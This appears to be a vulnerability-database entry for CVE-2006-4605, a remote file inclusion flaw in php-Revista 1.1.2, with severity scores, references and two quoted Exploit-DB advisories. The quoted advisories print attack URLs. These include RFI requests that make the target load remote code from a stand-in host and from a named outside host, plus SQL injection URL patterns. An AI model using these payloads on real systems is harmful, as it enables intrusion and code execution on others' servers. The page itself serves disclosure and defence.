CVE-2006-4605
published 2006-09-07CVE-2006-4605: PHP remote file inclusion vulnerability in index.php in Longino Jacome php-Revista 1.1.2 allows remote attackers to execute arbitrary PHP code via the adodb…
PriorityP342high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
3.83%
88.8th percentile
PHP remote file inclusion vulnerability in index.php in Longino Jacome php-Revista 1.1.2 allows remote attackers to execute arbitrary PHP code via the adodb parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| longino | jacome_php-revista | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
PHP-revista 1.1.2 - Remote File Inclusion / SQL Injection / Authentication Bypass / Cross-Site Scripting
exploitdb·2009-04-14
CVE-2006-4608 PHP-revista 1.1.2 - Remote File Inclusion / SQL Injection / Authentication Bypass / Cross-Site Scripting
PHP-revista 1.1.2 - Remote File Inclusion / SQL Injection / Authentication Bypass / Cross-Site Scripting
---
Discovered by Sirdarckcat from elhacker.net
Revista 1.1.2
http://php-revista.sourceforge.org
Revista is a simple spanish PHP magazine editor.
It was done by php.org.mx
It suffers of multiple vulnerabilities.
Remote File Inclusion
http://revista/estilo/[ANY STYLE]/index.php?adodb=http://evil/script
SQLi
http://revista/estilo/[ANY STYLE]/busqueda_tema.php?id_temas=-1+[SQL]
http://revista/estilo/[ANY STYLE]/busqueda.php?cadena='+[SQL]
http://revista/estilo/[ANY STYLE]/autor.php?id_autor=-1+[SQL]
http://revista/estilo/[ANY STYLE]/lista.php?email='+[SQL]
http://revista/estilo/[ANY STYLE]/articulo.php?id_articulo=-1+[SQL]
Credentials Bypass
http://revista/admin/index
Exploit-DB
PHP-revista 1.1.2 - 'adodb' Multiple Remote File Inclusions
exploitdb·2006-12-03
CVE-2006-4605 PHP-revista 1.1.2 - 'adodb' Multiple Remote File Inclusions
PHP-revista 1.1.2 - 'adodb' Multiple Remote File Inclusions
---
--------------------------------------|| Viva Palestine ||-----------------------------------------
--------------------------------------|| Free Saddam Hussien ||-----------------------------------------
php-revista execute("$obten_rev");
$id_revista = $obten->fields["id"];
Exploit :
Http://www.Victem.0/[php-revista_PaTH]/estilo/Digital_Multiplex/index.php?adodb=http://4azhar.com/soft.txt?
Http://www.Victem.0/[php-revista_PaTH]/estilo/discreet/index.php?adodb=http://4azhar.com/soft.txt?
Http://www.Victem.0/[php-revista_PaTH]/estilo/galveston/index.php?adodb=http://4azhar.com/soft.txt?
Http://www.Victem.0/[php-revista_PaTH]/estilo/mergedidea/index.php?adodb=http://4azhar.com/soft.txt?
Http://www.Victem.0/[php-revista_Pa
No writeups or analysis indexed.
http://secunia.com/advisories/21738http://securityreason.com/securityalert/1499http://www.attrition.org/pipermail/vim/2009-April/002167.htmlhttp://www.osvdb.org/28443http://www.securityfocus.com/archive/1/445007/100/0/threadedhttp://www.securityfocus.com/archive/1/502637/100/0/threadedhttp://www.securityfocus.com/bid/19818https://www.exploit-db.com/exploits/8425http://secunia.com/advisories/21738http://securityreason.com/securityalert/1499http://www.attrition.org/pipermail/vim/2009-April/002167.htmlhttp://www.osvdb.org/28443http://www.securityfocus.com/archive/1/445007/100/0/threadedhttp://www.securityfocus.com/archive/1/502637/100/0/threadedhttp://www.securityfocus.com/bid/19818https://www.exploit-db.com/exploits/8425
2006-09-07
Published